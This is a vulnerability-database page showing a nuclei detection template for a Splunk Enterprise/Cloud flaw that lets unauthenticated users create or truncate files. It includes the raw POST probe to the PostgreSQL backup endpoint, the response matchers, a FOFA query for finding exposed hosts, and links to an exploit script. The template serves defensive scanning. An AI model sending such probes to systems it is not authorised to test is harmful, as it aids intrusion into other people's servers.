Lucene search
K

Splunk Enterprise & Cloud Platform - Unrestricted File Upload

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Unauthenticated users can create or truncate files via the PostgreSQL sidecar endpoint in Splunk; upgrade.

Related
Refs
Code
id: CVE-2026-20253

info:
  name: Splunk Enterprise & Cloud Platform - Unrestricted File Upload
  author: watchtowrlabs,DhiyaneshDk
  severity: critical
  description: |
    In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.3 and 10.2.2510.14, an unauthenticated user could create or truncate arbitrary files through a PostgreSQL sidecar service endpoint.<br><br>The vulnerability exists because the PostgreSQL sidecar service endpoint lacks authentication controls, allowing any network-reachable user to invoke file operations without credentials.
  impact: |
    Unauthenticated attackers can create or truncate arbitrary files, potentially leading to data loss or system compromise.
  remediation: |
    Upgrade to Splunk Enterprise 10.2.4, 10.0.7 and Splunk Cloud Platform 10.4.2604.3, 10.2.2510.14 or later.
  reference:
    - https://labs.watchtowr.com/why-use-app-level-auth-when-every-database-has-auth-splunk-enterprise-cve-2026-20253-pre-auth-rce/
    - https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253/blob/main/watchTowr-vs-Splunk-CVE-2026-20253.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="enterprise" && body="splunk"
  tags: cve,cve2026,splunk,postgres,backup,vkev,kev

http:
  - raw:
      - |
        POST /{{region}}/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic ZGFnOg==

    payloads:
      region:
        - "en-US"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Failed to decode"

      - type: status
        status:
          - 400
# digest: 490a0046304402201da430780814d7865c4b2fcab64e649e06b260eac684ea5f5860ea46bc4dd3030220433b9e7f6979eecf0350f43d916747e20ab31f1620f4875672d5f25a8c6831a1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jun 2026 21:07Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.19.8
EPSS0.88171
SSVC
10